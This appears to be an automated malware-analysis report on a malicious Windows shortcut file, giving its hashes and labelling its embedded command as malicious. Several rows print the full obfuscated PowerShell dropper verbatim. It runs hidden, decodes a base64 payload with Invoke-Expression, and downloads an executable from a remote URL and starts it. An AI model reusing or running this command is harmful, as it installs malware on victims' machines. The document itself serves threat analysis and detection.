| Hash | Hash Value |
|---|---|
| MD5 | 020af94fb45abb8f50b8a9167ab408c3 |
| Sha1 | 716372e9b04acb364f615df4c796b7e8886cf414 |
| Sha256 | 1a2c595d6107450c9bcb1f204b2791dc610565399511f9fb34975222fb53570a |
| Sha384 | c38349ea8747d58bac61ee11e91dfd94535472fa91769a561993ccc63db2bcbd884cfef0876dc5c09b06273791c6a9ec |
| Sha512 | befecae14a6dec9d996a53d154a6819a38ade8ee7b9b248453233d783f56e8643530118caebbcd7085ce1588eee5ce981570340c754ad7283fb7833ee4ed035e |
| SSDeep | 48:8gK461qZHiVXzQ1+xIG7avIKQjqW0OHALKl21tmw2fMIpfvU3Nx:8gl61qBgEtGVWW0OHALKl2+w2k |
| TLSH | 4581CC1117EA021DE9B3AA366DFAB5519673FC26B9318A9E11CD020D0B33500EE21F3F |
| Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" |
| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -WindowStyle hidden -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious |
020af94fb45abb8f50b8a9167ab408c3 |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious |
020af94fb45abb8f50b8a9167ab408c3 > LNK CommandLine |
| Deobfuscated PowerShell | -windowstyle "hidden" -NoExit -Command "$UMLKW7 = 'cVDnCbIvOjYgyYmRQTTA4Y0lJVjY0TFNldC1Db250ZW50ICRlbnY6VEVNUFxPSCAnUmV2aWV3JztbTWF0aF06OlBvdygxMCwgMjMpO1tNYXRoXTo6UG93KDEwLCAyMyk7U3RhcnQtUHJvY2VzcyAkZW52OlRFTVBcT0g7aXdyIC1VcmkgaHR0cHM6Ly9naXRsYWIuY29tLy0vcHJvamVjdC83NTk2MzE1My91cGxvYWRzL2NjZjA0NTg3MTRkNzBlYTk0NWM1MzQyZmRkZmE4MWM1L2Vzdi5leGUgLU91dEZpbGUgJGVudjpURU1QXDJMTzFNZXN2LmV4ZTtTdGFydC1Qcm9jZXNzICRlbnY6VEVNUFwyTE8xTWVzdi5leGU7RXhpdA==';$E0LO9IB = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($UMLKW7.Substring(13)));[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);[Math]::Pow(14, 14);Invoke-Expression -Command $E0LO9IB.Substring(13);Exit" Malicious |
020af94fb45abb8f50b8a9167ab408c3 > LNK CommandLine > [Deobfuscated PS] |